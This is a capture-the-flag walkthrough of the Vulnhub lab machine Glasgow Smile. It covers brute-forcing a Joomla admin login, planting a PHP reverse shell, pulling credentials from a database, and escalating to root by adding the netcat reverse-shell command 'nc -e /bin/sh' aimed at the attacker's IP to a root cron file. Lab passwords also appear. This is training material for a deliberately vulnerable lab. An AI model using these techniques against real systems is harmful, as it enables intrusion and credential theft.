Hi guys! In this article, I’m going to show you how to solve the machine named as Glasgow on Vulnhub Platform. Glasgow is an intermediate level machine which has three user flags and one root flag. The Glasgow machine has a story like enumerating directories of website for brute forcing to login panel after creating wordlist by using words on the website. Once having access to panel, uploading php reverse shell to get low shell on the machine. Then, getting first flag with obtaining first user’s credentials after finding database credentials and viewing database content. After first user, cryptography is the step for getting second user’s password. When getting shell as second user, recon is needed to discover some hidden file and guessing file’s password to see content which includes the third user’s password. Finally having third user, a bit more recon is needed to see what’s happening on the box and figuring out the way to get root shell.
As always, the first step is running nmap on the machine to see open ports and running services on the ports.
As you see, port 80 is open and a website is running on this port. Also port 22 which is SSH is open. After checking open ports, we do fuzzing on the website.
We can see that there is a directory named “joomla”. We can check how the website looks like but before that, I want to do fuzzing on joomla directory.
Here we can see that there is an “administrator” directory. This directory is a login panel. I’ve tried some default credentials and bypassing techniques here but no result. When we check the joomla website, we see there is some information.
Here it seems meaningless at first but after a while, I thought that I can create a wordlist to use on login panel. For that, we will use “cewl” tool and run “ cewl http://192.168.134.129/joomla > wordlist.txt “ command to create custom wordlist.
Once we create our custom wordlist, we intercept the request and sent it to the intruder on burpsuite. At this point we set “joomla” as username because I’ve found it after trials, highlight the password field.
Before starting the attack we need to set our custom wordlist as payload.
Once we run the attack, we will see lenght and status of every payload. As it’s shown highlighted, Gotham and City have different status code and length. When we check responses, we see “ Gotham “ is password we look for.
SHELL AND USERS
When we logging into joomla control panel, we go template setting and put our php reverse shell code into index.php.
Once we listen the port we set in php shell and visit the website, we will have low shell on the machine.
After doing some recon, we find database credentials in configuration.php.
We connect to mysql and see database name by running “ mysql –u joomla –p “ and “ show databases; “ commands.
Then, we run “ use batjoke; “ and “ show tables; “ commands to see tables names in database.
Now we can see content of tables. To do this, we are running “ select * from taskforce; “ command.
As you see on the photo above, we obtained some credentials and when we check users on the machine, we can understand that we got user rob’s password. But password is in base64 format. To decode it, we run ‘ echo “Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/” | base64 –d ‘ command. Now we got first user’s credentials like “ rob:???AllIHaveAreNegativeThoughts??? “. We are logging into ssh as rob and getting first flag.
For second user and flag, we are viewing “Abnerineedyourhelp” file’s content and using cipher identifier to identify what it is.
As The Cipher Identifier says, it is most likely Caesar Cipher. So then let’s try to decode it. And success!
Decoded text contains user Abner’s password in base64 format. When we decode it we will have second user’s credentials like “Abner:I33hope99my0death000makes44more8cents00than0my0life0 “. Now we can get second flag.
At this point, I used linpeas script to do better enumeration. And something got my interest. There is a hidden zip file.
When we unzip the file view content of it, we will be have user pengiun’s password.
Thus we got third user’s credentials like “penguin:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz”. Now we can get the third flag.
When we view note in user penguin’s home directory, we will see that it gives us a hint for root.
Here, “.trash_old “ file is software that author mentioned. After some thinking, I used pspy to monitor running processes on the box.
As you see on photo above, “.trash_old” file is in cron jobs and running by root. So we can edit file to get reverse shell as root. To do this, we add “ nc –e /bin/sh 192.168.134.130 1234 “ command into file.
When we listen port 1234 on our machine, we will get reverse shell in a while. So we can get root flag.
Glasgow on Vulnhub : https://www.vulnhub.com/entry/glasgow-smile_11,491/
Cipher Indetifier : https://www.boxentriq.com/code-breaking/cipher-identifier